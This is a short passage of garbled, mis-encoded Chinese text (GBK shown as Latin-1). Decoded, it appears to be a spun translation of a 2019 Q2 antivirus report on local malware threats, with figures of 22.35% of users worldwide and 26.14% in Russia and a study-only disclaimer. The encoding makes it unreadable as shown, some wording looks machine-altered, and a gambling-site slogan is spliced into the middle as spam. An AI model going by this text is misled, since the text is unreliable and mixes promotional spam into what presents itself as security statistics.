ÕâЩÊý¾Ý°üÀ¨Óû§ÅÌËã»ú»òÅþÁ¬µ½ÅÌËã»úµÄ¿ÉÒÆ¶¯½éÖÊ£¬ÀýÈçuÅÌ¡¢Ïà»úÄڴ濨¡¢µç»°ºÍÍâ½ÓÓ²Å̵ÈÉϼì²âµ½µÄ¶ñÒâ³ÌÐò¡£

* ²»°üÀ¨¿¨°Í˹»ùÓû§½ÏÉٵĹú¼Ò£¨ÉÙÓÚ1Íò£©

** ¸Ã¹ú¼ÒËùÓп¨°Í˹»ùÓû§ÖÐÊܶñÒâÈí¼þÀàÍâµØÍþв¹¥»÷µÄ±ÈÀý



×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2019ÄêQ2£¬ÍâµØÍþвµÄµØÀíÂþÑÜ


×ÜÌå¶øÑÔ£¬Q2È«ÇòÓÐ22.35%µÄÓû§ÅÌËã»úÔâµ½ÖÁÉÙÒ»´ÎÍâµØ¶ñÒâÈí¼þÍþв¹¥»÷¡£

¶íÂÞ˹µÄÕâÒ»Êý×ÖÊÇ26.14%¡£

 

ÉùÃ÷£º±¾±¨¸æÖ»ÊÇΪÁËѧϰÑо¿¶ø·­Ò룬ÎÞ³öÊé¡¢·¢ÊÛµÈÈκÎÉÌÒµÐÐΪ£¬Òò´Ë²î³ØÈκΰæÈ¨ÎÊÌâ¼ç¸ºÔðÈΡ£